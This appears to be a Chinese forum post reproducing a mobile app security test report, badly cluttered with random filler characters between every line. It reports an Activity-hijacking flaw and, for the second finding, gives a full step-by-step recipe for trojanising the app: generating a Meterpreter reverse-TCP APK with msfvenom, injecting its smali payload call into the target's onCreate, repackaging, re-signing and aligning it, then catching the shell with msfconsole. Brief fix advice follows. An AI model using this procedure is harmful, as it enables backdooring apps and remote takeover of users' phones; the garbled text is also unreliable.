* u6 [. \& ^# E8 M A% y: F. m+ _. i0 U$ U0 f. J) j 1-2 测试结果 ! m' a) r2 n( E% }* ` - r- m' h/ E) \2 G

4 W6 I( V4 Z6 m6 _; C * ?5 x) F, c/ ?. y

m3 C1 z1 O) p% E8 }7 T# u . k' v* l6 @; f$ {4 V7 {* l   k9 |8 j! E% L [+ z8 A: m# x' d+ [7 }+ j) X/ p

( \" o+ l! F. A# G1 S/ S- p# U 0 l6 p& z, v3 `7 p+ I: k/ ]

( s' l1 Q0 s+ U. k$ ^( x1 V- _! S& x" D$ V 2 检测结果                    , G! F. j* E: F! j) a : {: p4 O8 @1 r/ q$ E% i

: G( K, ~0 w) P4 g: ~ 6 c; `2 I* p, l; R1 d( `8 G

+ y1 m) J/ X" V: v; b) | " O0 f0 n5 c! v0 L2 D) z9 m 2.1 某某某 D' B1 O2 i* d+ |7 e: y- l 2 F( t. r. |! ~5 z1 s

! \3 ?' t5 u, h( u/ z. x5 j w3 G( K$ R; ?% `

2 R# ?5 ^! g/ z3 H' p& I # Q6 d- J- ^& `9 ]# _" B 2.1.1检测目标 . ~0 m$ z' O5 F+ Q4 a ) q1 Q/ S3 \& f* g( L

; D# n2 q7 K ]+ ?& v# U9 Z1 S" ?; t( }2 ?3 s5 S

" P# m# [5 H0 l- }# V4 X& I) F3 A6 Z+ I, K! O 目标地址: 某某某某某某APP 6 A; \7 [* e/ w. A, U! c R n/ f* p* _* ~- G: V) \0 A9 i

) |+ Z% z$ t+ [4 e0 l; N1 X1 X # [: s r) H" @ ^/ j

$ Q, ]4 V F7 H" n8 ]* C+ Z) v: ~ @6 K8 ^* o 2.1.2检测结果 6 d2 x* k' a5 d `( T / B- d# B) b9 a' i2 {# w; N; s

# S% b, `- k( s; ~' U" I( E R/ ^! g+ b) E" I: e

& E$ F! R% c/ t1 e& _2 l( d) p% s0 f, H5 f% S* c/ U 2.1.2.1 % H- }' Q3 a y4 x! z x5 a& s0 X7 V

. j/ ^) S$ j( n9 S3 F9 S * K" W; ~& p) o2 j

/ ^1 k+ J' G! L3 i, P! b) U : \; o! o+ z! h; Y9 s6 } 漏洞链接地址:某某某某某某APP 2 A- E2 z1 v/ r % V+ e% H" l1 o

- x7 @1 T) x+ d6 S: d! T D3 o9 O

# f2 Z/ O$ y' z5 O ' G9 i, x* w3 E6 O   ! M, S1 Y" x5 F 4 E1 |- @ g! J/ C8 G

' G3 _% {8 L0 R/ Y9 }" {) K / q* d% ^0 v: Z0 f

" N. b4 C3 L$ b0 {; f- l . F" y, _4 r- ^* ?8 v 漏洞分析及取证: 6 p5 X) z6 ~) e4 r2 y" q- |: |; k) \" A# _( @# ?

* `2 {" V. m7 o b$ v2 E+ Y, {5 N0 H# q2 P' G3 T- a

5 E+ z* m+ M" n4 g% e. \8 W3 } g! D& z: X7 \5 k                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: / Z4 y" A* q( @0 A3 D8 z0 R$ {5 c& b : j" _7 q4 W. K5 i3 r7 u# m

' H: ]- J: X% _2 k8 U' w! v * `' ^1 {2 z6 c# R1 ?0 f4 ^

- m+ s3 Y9 w- _ l! g8 f3 T / y: f' }+ P7 P) o      % \# l! `1 f4 @- e$ P+ \3 ?( Q

$ a" x4 e& h" c; j! ^3 {- Q& Y 0 k/ N. l6 \/ z3 w3 x6 b

" \; A' k' @/ W0 S7 I/ c L5 o; e8 |' m/ C+ Y) y% C+ B7 Z                       # Q1 }0 a% D2 n2 V" ? ) ]+ U0 { D6 F) K" f3 U" B

/ E8 F" ]3 @( [ * W& p+ F+ U) L/ j3 Y

8 l' M* g) w Q' c2 x. b; ^5 |. a. L- x" O 8 B1 s1 z# }' r9 D9 ~2 _! @ 5 ]! s* w$ J. k; [

* d- h. b4 a0 D4 I) c9 H& T5 a7 v8 a

" V* X# ] q; c* A! P' {. E( p$ \. a% g* @2 l$ G 2 g1 v& H3 @ a# Z# _7 F . F" A2 F, \# c/ W5 V

$ S5 \3 W3 V( \' z; H- g( l 5 u# |# a, ~! |3 z

v: n9 w/ @8 k# ]1 L+ O$ }5 z4 p" v8 ]3 T# ~4 u : x6 E* g B5 m- L! R. l' y( k5 z , H0 ?5 W/ }5 h: z

* V" ^; h1 s/ W( V8 ~ 1 T+ s, O( G! V& _ s

n% k$ N8 ^ _ - H" G( e1 u5 j h8 H! o' N* u 漏洞危害:高 . o/ z7 O1 d$ L2 D7 D6 M , |8 A- Z v9 |

; G5 L5 O/ a7 U& f/ W5 r, K j2 e/ p0 t5 h/ n( q, R: n3 q
; d* q9 {& j8 i5 v# l & M4 T8 b' D5 ~ {& E6 Y+ _8 e7 S: x: u ' T8 b, Y& y7 w& C2 \$ J( q! m( F, H4 Q0 S# A# H5 V9 l, ^6 k3 ?0 [ D! p8 F* L1 ?0 w$ H& w$ N2 I! q j. c. y/ M* N% G8 `& B) B$ R0 U; R3 ^0 Q9 M8 b1 |* Q6 h' a, [9 O% p% r% q% A7 s" c9 ~' n/ m. k+ e, t5 N, b2 \* B2 X* L) y( C$ n; m. Q: h$ F# d, q, Z) V* y# j6 M5 y$ G6 G% r. ^" M' w- H& R6 Q# S" F* s# \) P9 u) m1 u* ~0 T8 E( Q2 d5 j# Q$ ~1 Z. h+ ^6 Y9 T3 l0 {2 P4 a4 {8 y: @% v' p- P3 j) K' X/ h' t! A: X8 k5 E% t' ]1 F- m2 `% m% p1 f: C8 X ]4 k5 r- F* @. C& ]6 E- V0 T4 `! q/ H. m8 D* I3 r, | S f' s& i K7 g" J5 w9 d4 F1 l3 r F; }& g+ J7 {6 e/ t$ x4 ]/ `! F6 x: Y' `2 p; |* b: [0 H( b# n7 O
2 H7 U1 O; U% P. T- j" f ! H$ X7 @8 Z1 o8 e& x3 Q

9 Y- i( _2 s! ]4 i7 ]1 X6 a t ! t* C( Y5 E9 K3 ~8 T 严重程度 4 ^( z- K! e/ W, s6 o/ L % z, O) U2 H: D) h# S0 v1 h7 p

# e" Z* M1 X- @" j+ \- G4 h . l% i& l" E2 n, w7 {6 i( M! x a 		. \. G5 M( }* s! z3 {& |0 a9 {; e: L p- ^" I' r3 A8 e# e

, w% B+ J& X" o. T# u+ V$ Q" P5 D, ]3 W4 b# e; c" p$ t' \ 1 X( C5 q: W: l9 ]! U5 ~2 p' U# W0 V) B3 c5 \

- C( d6 i, U; O( B; p/ W& s9 I* K1 a7 S1 v* u7 S! e) U6 N 		" ^/ K9 A" `6 _/ @2 q- k ! P$ Y3 r: g8 [; W! H. e$ k

- ^3 L3 g7 R) N! q7 k% U$ a0 H8 `5 l 0 E& z9 d8 N3 P* F% S 0 g# K0 {. e$ B+ j' P8 b3 @ ' B1 ?5 G; X% r0 b7 i7 P; g

2 H; f5 w& b9 l N5 t% N/ w8 Q+ I 		9 u: b% ^ _8 y' R' @2 Q# f1 h $ W3 J$ O* e! ~2 N/ r2 w$ i

7 y& a& t/ M' A1 o2 a" Z5 \0 ]; M8 \0 j0 ]! ^! ^. P3 l 4 y! p3 b& p5 X2 F2 j1 o- u/ e& ^ 2 x( y; K% H2 |) p6 I0 v$ @

2 I, E: x) O: k6 C' q/ w! B Y9 Z, p( ?! G# l1 U 		1 [8 u# P8 L% D# n5 _8 k2 F; v! O( A @7 Q' P9 e

0 [7 K# C3 R3 O6 g( p % t9 B0 ^" N& b8 [4 c   ) h9 E- G8 E# W/ c8 M4 {" Z 8 O& ] p4 w, E7 p

% {, B n# h+ k+ I ! ]( p, C7 W( b! u4 w9 n 		( ~" `$ Q ~% a1 q7 m ' f# `: h; l, g8 {+ w+ Z$ b

1 X0 {3 u9 {1 Y$ R1 v . G+ J& q2 }; I5 O$ ]6 J; l! S # c4 b8 i9 t. U# D2 y; f$ u! K. B$ Q2 F$ Q 4 i6 c3 H2 d5 D7 M0 d" R/ v

9 O( W* F. x% x2 n! [6 B F7 |. {1 a( V. k1 ] l/ x5 f 		6 K7 o5 L: ?9 M! P1 v* t 7 T, B T1 O9 h; N! _; b5 h. N

2 ]* g% s& [5 \7 L2 T; A& ^3 g; I. T2 n! a' f7 t5 R# g8 y! I) m   3 Q! M1 m5 p6 R) q# G7 ?' b8 ? $ A; X( `9 y5 _, ?( F2 O

, Y# E- q+ n- [- l) n) W$ x 8 c9 O6 x' Q9 O ]8 l
' @1 q6 _. r4 T' v) d1 C1 O/ _ 9 b; P4 V) ^4 o/ M) `. `: R. v
0 O. c0 y! ]. X, ~& S6 C* L6 v( z& W

8 @' J- k7 Z+ X2 ?+ O3 E; K1 k 2 @5 R1 F6 @+ z4 T8 b1 |4 U J7 U   * L3 L+ |4 A# h2 Y 4 D9 |+ i$ e8 X% |7 x, x

/ M3 o+ F* l3 F3 S3 V" f. E# e2 n" u0 R# z$ E/ A! c3 A

+ d7 Q: k5 h9 f- `. M$ m$ ]9 _) @; C f 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ; ~( G8 V5 @, i3 a 3 e8 t; R5 s8 C. L- X

/ H i9 B* p* @7 G* O; R9 g6 [& v/ F: }! @5 X1 @" k

; V# B# ~+ l9 M1 K+ l7 h # v2 C6 u V( \& T1 F           / P/ t2 K. P. R( u: `$ O4 k5 ~1 a/ v. B3 @9 F

) _( _" R- j/ Q8 \# h( d$ B3 y- R2 z- [

4 C+ [3 q; h+ M( T; V 3 S* e+ B" ^/ C   8 o9 |9 P7 K+ P # a5 V* Q4 y7 g' [; U* h& \

9 t, l0 E. [9 A% M& y) k A% P( o( ], L% N

" q, ]; H; A3 M" U# g0 E # X( d' J( p) l, X+ l 2.1.2.2 % [" _: u& ]0 @2 Z0 @+ j 6 [, z3 Z) S- |8 y

1 U2 G4 K/ A" _* \' p / s4 Z. r M7 e

9 U. b Q \$ y- ~ ' L* \/ ?) ~( |0 i; f# t3 m9 f u* T 漏洞链接地址:某某某某某某APP 6 G# z+ X; z- D4 v! Q. ?0 V& t7 q 7 I8 Z$ Z- \' e+ y

/ ]1 ]! G; |5 x' H7 h # ]0 L; v: B2 B0 G% `' P8 s

* M5 d) _) \6 p0 y 2 t3 j4 | r8 @- b2 H 漏洞分析及取证: 7 I. Q0 t7 t0 ]$ n, k. ]7 T# d* P# [/ U/ i

. ~, q' f4 z1 W: p- y# ` 7 K3 ?$ G( L+ ~* }

8 y- ]5 a% b# s" L' K8 u 0 z }8 f* U% [2 L                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: - o4 Y. M2 D0 i1 v / W; H/ k" H( m! ~- y( N6 C+ Y! b

+ g# U4 k( u. B6 X 2 H, P- N! |% Z t' {" a

0 _: M8 T# I N: |# J! S ( y; d/ v0 n* p# f: }2 a Metasploit 生成木马 apk " N6 W+ d- t) T+ X ! X* s1 m4 E5 }2 W: m, S, _

; ~& q# I6 [3 Z2 ~6 u' I " w- }4 X6 V: ^: t2 s; q

. C: [$ y; c6 h2 X _/ k8 O% x 5 e2 j ?0 z( O) f& D) @. m, V msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 1 ~9 T9 v" I! Y# t2 P$ W * [; C) ~+ e$ e: M, ~* v. C$ Q& r

1 n2 o8 E" ]6 Q) t # m+ U: \* l$ b' o4 Y* [$ L" |

: u' |) b6 @. D% _) i6 T2 |( @, [7 j1 B$ e: k# W1 x$ _ 反编译目标apk和木马apk 3 N$ _* _$ \% L/ C K7 p 0 [/ \1 P6 h5 K6 N8 J: W/ U) |

; W2 a. c+ O- {. E, K! P 5 A, i# O9 `7 R" h! Z) g9 o

Y6 J' j8 c3 a7 Q# H , t% d6 V/ C5 m v apktool d target.apk
* r; |) T- H9 I. d1 T/ U5 K# m ? J1 q+ H: `, Y' {+ U* F apktool d cockhorse.apk 3 X8 x) b* a% e: z, U4 S0 b3 ~" B) z 0 R. v: H% _2 r1 U* ?" V/ B

5 j" d! m6 c9 o8 Y* M: } / B1 ?! F+ l! ^5 J. Y# {

2 {) \- g/ }1 `5 i$ D* V. I' O- m* g9 a! ^ 木马 apk 注入目标 apk % A9 {, e8 u3 y: U$ ~3 H( g7 l0 N2 d0 m4 c+ l# V

7 ?% G2 T8 [8 R# l4 f) \* ~ R- T4 m# V y8 N. [

1 D( h- x/ H6 x" S) F5 N7 I. |: l 8 U- e* B/ g. E0 j6 S 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
& A& g1 B1 _$ Q7 r: \: h, z N" ^+ O! d1 I+ F: o invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 4 h9 H3 i1 |2 I _8 B - [2 l/ j' C) Q- p. Y

! R6 ~5 t4 Y; ` # p0 D7 |$ ? c4 M0 H' m

9 D1 ]: K" L& v8 v3 B$ z 9 H- C: @! F, q& Q$ }7 o0 H8 U% F 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 . g, ]( I! i* V( m ! w4 S9 Z- U4 A* t6 l

; b2 u! U3 p+ L1 I: D5 L ' i. s. E8 {" p) z+ A5 H% k

- t- S: h9 M$ \* r4 t/ V / R# ?4 x# N3 `1 p( S, ^ 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 1 p3 t+ ^+ ]5 c1 Q5 R. | + r+ R( Q+ `3 D$ w

( J9 R/ S: x& K g9 v8 G/ Q # c$ q' S8 h* d4 R, u3 x3 B

% r" `2 ^4 G+ I! |; R3 y* C) g ( h( j5 q& i/ E2 S x1 k 回编译生成最终 apk 4 M: p# C, T8 D- Z1 n, b4 h0 v& X

1 S5 d7 W/ ~6 @6 e$ U, ]$ C" J8 J / o* }! l) ?8 T* U! p4 W

8 C6 b7 R4 I' t& r , y0 N4 m/ L$ j: t1 y% e, l f 重新打包 0 o" Q( z0 J' e7 O8 t8 ]2 k6 A: `; D) S! A

9 C6 J1 ? R4 F7 [ " y/ q- D% |% `# w5 U3 y

$ i+ H+ b7 l1 Z9 C5 u8 ] ) y7 ~% J9 F$ S; r apktool b -o repackage.apk target_app_floder 8 X+ D# O* C) t* I; @ 9 d" Z5 K5 f, @# S R

- P) v `& `4 x2 t9 E$ b$ g7 |/ i. E ; y) Q! m1 L/ H* s4 H- ?

6 T. b v# s3 R+ g ^$ o; i0 g) b! S 创建签名文件,有的话可忽略此步骤 7 K* {5 ~# P+ ?7 @" k $ k: K, e R6 q2 j* \- N5 g4 q

/ k; j1 L6 G$ W' ^6 h5 f# u' R " n4 f: k2 E( B* q

' W6 D+ n# a# ~3 P) |% e% g0 z/ u* C; v/ a keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                & V: [8 m' h4 o$ _3 e8 l4 z# I! a! H1 ]1 S% w6 j) j" G3 O

. b; O0 C, G) J# f2 l7 g3 O, V 6 U7 S1 A# {4 r4 c% ?

1 ^% F1 |' v; d! y, z3 s $ V% G5 I% M( f& ^2 J9 H 签名,以下任选其一 1 L$ w) r# U3 G0 ^ % V5 X& Y S+ i; g* ^$ D; c# O0 p

( H4 v) J: d& O' }" A2 N& D - o, }% ]) _, ]. o+ r1 @; ^& x8 f. Q

' \& R0 E; {5 ]$ l: ?+ M5 c 1 L4 `$ w) ?* c3 B" u' R. w D jarsigner 方式 $ r4 q- j: H& Q. q/ T5 o0 b J% G* g/ A

2 C0 e) o3 e' y: ^! {7 e1 |+ G0 C0 U: l" J3 Q8 r8 ^

7 F) F: ?7 y; p8 b$ @4 d . f! t4 D$ C, ? jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 7 g/ T7 k% N4 d; L2 O% z; i* N. [: d' q: _# x& d# |

6 X- K1 p) n9 {! x+ V& C: N 7 e. b8 M9 [) l! Q3 j- ~, g

Y" ~0 {$ f: @% @8 |% @ 4 E, `. s8 j/ K) |! r( R apksigner 方式 3 c2 I/ ]: G4 P8 {5 B: l m% F2 [& z* Q$ Z9 T5 ?5 u0 ]% F

* [) R3 l7 E4 k6 E1 s; J4 D) K, q ! ]; [- H3 q( X7 r' ~

/ ^1 L: \4 A7 Z1 X6 w5 I9 Q7 I 2 {& ]: s7 P& | apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk - |& H' w7 L: s! M+ _0 k% o * b( f; c3 I( z+ s0 S4 h8 c; S

8 p( m2 @5 P$ O/ ~1 U4 {4 F2 Q/ j+ X5 T* a# K8 V9 _$ V+ c

! O" m0 w0 Z$ R' u. F& v ; \9 s# J ^3 E 如需要禁用 v2签名 添加选项--v2-signing-enabled false / q9 B/ F0 ^1 G* { @! j 3 @" q2 H# G) j# y3 A/ s

8 t$ I9 o- O8 C6 n m/ D0 r $ W4 A8 e' q' z3 ]

. J- `! N2 t* j0 j. ]( F% ?1 v1 [% M! G 验证,以下任选其一 3 W$ O: [4 C3 P$ ^4 G9 M 3 w! h1 Z; |, o3 q

. a; S* T* B# d 2 t' i9 v- ~' r/ s" S# R

# }/ {# `- z- j) a2 m ) b* ~! S% J3 x( Z& A jarsigner方式 8 e4 j3 S" T& I ( ~: z( Y [/ z

) D9 r3 ?! A* e, g3 @* T9 d( @& K 1 o( ~ T& X4 o. P; W( e

% o" k1 v: Q! }0 @- x1 H2 K3 S' g. }) O jarsigner -verify repackaged.apk 6 Z3 Z$ r7 }7 O( y5 p3 r) l, l( X8 q f1 i: k6 I, T0 w4 A

' ]3 x8 ~5 Y- r, J- X - {1 X l2 o, v9 t2 c9 _

& u2 \5 i' L, e8 Z! y$ i 7 U/ Y' {; z8 Y6 v apksigner 方式 # J8 v+ g- {# ?& A! X5 J+ ~6 m% L: q, Y$ y+ |- S( \7 g2 n

# a: u9 u, j4 B5 g( ^" u% s* S$ V' R' r) Z- O

& x! Z! z+ T* l( f 6 b, {; `; N8 `# s+ `/ V$ u. U- } apksigner verify -v --print-certs repackaged.apk : J3 v$ M; B0 l" @9 l : r* z( H' v4 e2 E! n/ k

* l2 w6 f6 P2 ?3 y2 N2 F- h- T& l/ W: g; z' X

* o8 b, v) ^5 c5 _8 G% J" w. ~: h- V. i keytool方式 7 N& W) z/ o' l( b/ A, ~0 w/ m ! y" K! r7 z- ]3 U- T& V

A- `9 l9 q4 f; q7 c3 C ( p, q, c5 y O5 |' U6 y

$ G( W* p2 A- J0 f 3 J1 s, @4 p z$ [1 j- S keytool -printcert -jarfile repackaged.apk $ S2 M' E7 k% y: h4 Q - M* O% ]# ~; I: u+ |2 a

O4 `, Z4 \5 P+ l7 O. C ; H& N3 ]9 @+ N

; t: q+ [. F: @6 U4 O: T, [ 0 V, p S' J( k1 ?! |/ W. n 对齐 0 q9 N5 L+ j( s! V* P! k4 ` * p1 ^" h5 v& e g% \

+ h p5 y2 B5 n, ?! x# d7 b, h3 |# e 6 \( B$ h: Q4 O- ?# A* d: }

* Y+ s+ i5 J/ m' E; ~3 m: E' `* e 8 R$ \9 ~9 A1 Q3 A9 x 字节对齐优化 , y8 z2 |' B0 E9 F % T5 D6 ^5 b' Z2 x

* Z2 K9 X4 I, M ; K4 v) C" ?0 j) Z4 I# y- `

/ v, K* V5 N; F) o6 U: m 1 r% e; m3 Y; Z6 k; Y" G zipalign -v 4 repackaged.apk final.apk / S5 N9 H+ a5 R/ v* p3 x $ k2 |. O1 m8 g

4 g3 d; x# ^( k2 H% b7 w( Q ' k, [0 Y' q7 Y0 l

, ]) w8 n- z1 b7 _ % L; b6 |5 @1 ~# R7 V9 ^1 M 检查是否对齐 : i& p2 \$ b$ P5 r' V- X8 @% C) P3 O' O2 ]

8 B) o# ~9 ~/ N/ I+ A, |. \4 ^) ^# ^6 ^6 r8 Z# Z3 a' O

$ T. V x0 q/ N$ v( {6 x' Y/ k * @- N4 {4 S" l6 z" e zipalign -c -v 4 final.apk : E& M5 j9 i0 ?% {6 C C3 P+ {, h, Y5 j' @9 }4 Z

+ l' `2 B- t' a 0 ~* Y6 L/ C- L3 ?% H

& r# A% J+ x8 c% R: _9 T ' W( O$ Y2 B/ q 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 % ^7 L: Z$ Y& x# Y 2 T- i# g: x2 t& P

/ G& h" a2 W5 u- b , a/ d: C- N3 |9 S) ~, e! T

5 o4 O/ x) Q1 r: P2 ?2 f3 }2 h $ y$ z7 { c8 W/ j" b 启动Metasploit控制台,配置参数等待上线 : h: e' q( R9 y+ h9 o 5 L8 j. `" x1 Y9 x) ~' e

2 S5 h" M% M! e7 _6 C& j 2 k! ?( ~# u/ ]* \+ ]

5 A: b, n) C% l% P' @ + P: \6 b$ w3 E. W4 _3 K( ? 在终端依次输入如下命令 4 m" Q) K' v" I( O0 v * I6 V; b( l3 Z; ^

* H& T0 ]$ | l& I1 ^" q* { 6 A4 f ^$ s, i4 \8 L8 t1 ^( V

! u% q, L" ~* @! Q: @ . g! W# d, Z( ?# h9 }4 W msfconsole # K; y& L- v4 ~/ J7 U5 c7 M' J* G; T& x6 z: q* Y5 H

0 S, M/ S( a3 M9 l' A , R: D, j; R3 K4 c6 j

/ O6 I7 a" e& r. a# R ! i3 U7 u* T' Y use exploit/multi/handler [4 }2 J$ D0 I- B h1 O , `3 e6 w1 _4 D8 C' W4 h' g

1 T) N" z) E# M' G . Q7 V9 W) M- C

1 G' O# ^- m& o( F/ @( \ # Q5 L- r( j$ C9 l M# c/ P set PAYLOAD android/meterpreter/reverse_tcp 4 e0 r1 e5 _' p% \: V* Z8 ]2 e4 h 3 A0 [7 \+ I% @/ j

, d M& {+ v1 P1 e$ [ % G5 X/ ?) s6 y J7 c4 Z3 X4 ~- |+ z5 ~" x

2 M# X. |( W% q) Q8 }$ V7 A, v4 z# g o+ X set LHOST 192.xxx.xx.xx % d$ o: ~4 C9 S8 E8 Q( {, p& m3 {/ l, y2 z

1 I7 M5 Y2 p& J7 W s2 T' }& ^3 m! l) d2 N, ?" T

6 o. l! w2 e% ^ 1 k. G# n; u7 V3 H set LPORT 4444 / w' H% R& R d% }. Q / `. l) S8 q3 Q/ x$ d

* F& g1 W' x$ k% J* b5 Z 8 `2 L. Q! c5 {1 _- r4 j$ H

5 F8 j' I- r/ N t+ P # q& @. ]3 e* a+ S: H exploit 6 U# [2 A; a/ U3 P- u4 ?' C / W# h! C5 J! E

( S' T- ]# K6 E x. k1 q 5 ]2 \% @+ r+ Y( _

) h6 j: ^' b2 |( Q, ` : x4 `. |0 n" t8 Y) ~6 V 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               # q: W% T+ s/ L: t* G% v1 d- q ! f( }% W) w, ^

1 `9 i, e/ a/ A2 ], F 3 C4 @9 O Z1 H/ D+ K; \: P/ p( d

5 q- u! f: w3 u& v* W' h' t4 ?' t+ \3 w, H3 _/ f" D, i9 ] n 漏洞危害:中 1 W& n& {) z5 E/ h2 s7 K! I2 W8 G7 H2 P+ s. q

" _7 w# o0 v8 K( X; r+ e% L6 y( {. [2 Z; U2 A3 s
! m5 s" l# ?# X 3 O' W. C3 E4 A' O. A 5 N! D% G7 @6 S5 h ~- s ) x" D2 h$ d; _! } ( f- X- i, D, ~: `# t6 X4 Z7 v) t+ T1 A& N9 i/ ~2 I$ K8 U- n% V( T, x' h. n- |; X0 [+ E7 u$ n& @8 Q# F- V% m( u! ~9 k4 T5 j7 Q1 j" Z+ T1 z9 D2 ?8 J2 b% p/ W E- a& K. d8 c& s8 N# u; ~/ d, U# P1 H G$ j J1 Z2 o0 W" B# e2 ?+ s8 ?8 y) U3 {+ r3 v; D4 {1 @. f6 [0 j- {+ g+ j4 ]% H, @% g* `* i8 b0 W7 z( J& t, Y, U/ p: y- R, J+ R$ I3 K+ Q7 u% d6 ?: h3 n; y# [8 ?4 C9 L# N) O% t" h& K% R# |/ r( X1 F, ]9 X! Y, @* l. {+ Z* Y } Y& F- o* y* C5 c5 P* i! X! Z* `/ n( G3 S8 s' g1 Q9 e3 ^# A, A1 W) e7 d8 e$ U3 G" l3 B2 @0 @) R" W8 h9 J$ i: G ~' E' @
4 {- `% l$ u* X9 `/ C; \* ?- Z o + {; n9 s6 B' ~9 i" f

- g, F- Q" I! {- S1 | 9 {9 y r1 f9 c/ a( a- O* V0 H: A 严重程度 5 C, q9 f% H# D; @6 n. W9 b) J3 }4 C. f! |9 c/ H: ]8 k q: x

) P0 {$ y; v) j. g# h* {8 V 7 k. W& B$ |* M% v! S8 h0 _ 		% G" |. z9 E( T: ], `# f , ~" I6 U) D8 k; H+ {/ w

a& Z# w, }3 S* u8 E% l% l2 \2 U( V, ]3 m # `$ S' [3 v6 Q Z% `, c; j- s6 @ % q: [+ @, b. Q3 _6 M

0 R0 H' ^! `/ [9 h8 F$ M, K- y$ ` : O1 @0 R# [- r. A 		& i; l! p; p0 ~0 L5 I7 g/ @% @ @/ c

* ]3 j4 X6 J w/ V, B& J. D$ z _9 w7 V- K ; _- g, Q& m& w0 \, P( J : f" f3 x& ^. _7 L" e9 T

6 i+ A, O u/ k. B, V v3 G# f0 U% `6 H1 m0 I1 B 		7 `- R1 A3 F; u! B 4 A, W! s. a1 _% \

: B: j* A+ Q, V2 _0 K( o W& v4 s8 G& n( c3 F " w3 n& ~- x5 R $ W3 P2 w+ `' ^7 G" U7 B8 J

$ n/ X, M/ R% W. T! O* s; L6 d t9 v4 X% A( O 		7 t. ~3 Q; }% F5 d V" m q8 _ / b) v7 n) Z& z+ [. z# u% G w ' ^' v( s4 ]# z& i' a+ e# B( `, T 1 G2 k# q6 n6 y* M

, v1 ~6 c% Y; a " J7 o$ f8 s) P' j   / v2 m: f5 |) Z* i% J/ V% Y9 i- G( r5 I! n( s2 t

* \1 y8 V: X: e # y- ~4 O" u* D 		' s2 G! \' E! K# S- E ! {, \ S& k# \* F- H: E

& z! a; e9 K, v7 [+ [. W + z* n) D' ^1 r) d% ? ) ~, a) P7 v" c0 k B) p4 z$ Q# d7 a* a- A6 q3 i8 { ]

+ m4 |" }9 |; f1 E& k/ D 2 v1 B+ e1 a/ f( j' ^+ v 		- Z( V5 D! j/ z' ^/ ~/ A1 c 7 F! O' w- v% W2 n5 v( I4 {* X ' i7 h! K6 \: W5 b, W5 _0 b; J% U- G T2 J( Z+ f/ u7 n

) J. |( w: p* m' G6 l 8 R, G6 n- z2 F   2 W8 [, B* M6 c* c0 ~4 G. q7 L: f. e) `9 d" V

! S0 j3 C2 U8 Y- H) D$ t& p% f - g$ U0 `. }; h2 h
/ h8 k6 }& k) \# u: I . g" [; F5 s# V% @: R( F1 o
6 k# s. p, e' Q# y2 n# T5 k3 ^" R' u# g7 p; a0 D( o' `& U B

0 B( J! D2 F* }) { C2 I8 l- L 7 [5 E" e) N* n: ^   % {, Y+ o" j& R# H( T8 W 1 A9 W! q! v- T- g. O

9 ]# H/ {& L2 w. X* Z$ y- }) S2 Y: W* B; p& \+ M

* Z4 K, X% S/ D; g2 }& m$ @ ! Z v; x' A+ B! e 修复方法: : M6 t+ k: @! Y2 y0 G2 g2 Y4 d 8 i) I; F' m/ C" |

! H: |0 w1 |7 M7 y & ~+ X) n r3 X4 N4 O; K

% x0 l- B+ ?5 J+ J " j o" _) M A8 A1 M: s' F               1. APP 启动时应做签名校验防止二次打包。
. D! c0 Z7 Z1 O$ e2 L. v& g ' T4 `5 p5 b, H; E8 m4 G+ l: B 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 0 N7 [; o2 {9 i$ r& R0 l# L: E" g4 B: K. t6 W- n8 j1 b

+ B/ f0 T0 _0 t' X, `; g6 e 7 s& d6 R1 {% X : ^% z$ @& r0 v8 T& E3 X. I ( I7 J. Y6 g' T4 l

5 Q2 H& m7 I4 m4 A! H . u% p& z, ~- w$ C0 ?+ u/ ^   0 x6 d+ ^6 `% V5 d1 o+ l! A; c 4 _$ a8 Z4 z3 H c) M

3 d8 h7 {0 V" ] 9 L0 d# o9 `2 @4 ]5 Z$ k2 f o1 U / h" z4 z* d H0 d + \6 [1 L- [. S2 I9 d9 x

% {, m3 b( l& e* q8 _* ?! `7 p y$ r& m t7 ?
- E; G5 I, W1 ^: g, d4 R: n& W$ Z . e+ V6 L) ~# q9 B7 G: A$ h

7 y I. t6 P" n5 p : e5 V: L+ {$ o5 U( `+ B' d. c
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表